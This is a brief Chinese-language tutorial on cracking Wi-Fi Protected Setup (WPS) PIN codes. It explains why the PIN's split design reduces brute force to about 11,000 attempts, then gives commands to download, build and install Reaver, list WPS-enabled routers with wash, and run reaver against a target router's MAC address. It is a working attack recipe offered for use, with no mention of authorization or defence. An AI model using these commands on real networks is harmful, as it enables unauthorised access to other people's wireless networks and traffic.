PIN码破解

为了方便用户连接wifi，Wi-Fi联盟出台了一个解决方案Wi-Fi Protectd Setup，简称WPS，但是这个方法有个安全漏洞。本文用Linux的Reaver软件使用穷举法破解PIN码。PIN码共8位十进制数，分为前四位，后三位和最后一位，其中最后一位为校验位，可以根据前面几位计算出来。所以穷举的次数为：10^4+10^3 = 11000。PIN码破解需要在信号强度很强的地方进行，强度负号后面数字大表示信号弱,数字小表示信号强。

1. 下载源码wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
2. 安装依赖库apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
3. 编译安装

cd  src

./configure

make

make install

1. wash -i mon0 -C //查看支持PIN码破解的无线路由
2. reaver -i mon0 -b 路由MAC地址 -S -a -p 路由PIN码 -vv //开始PIN破解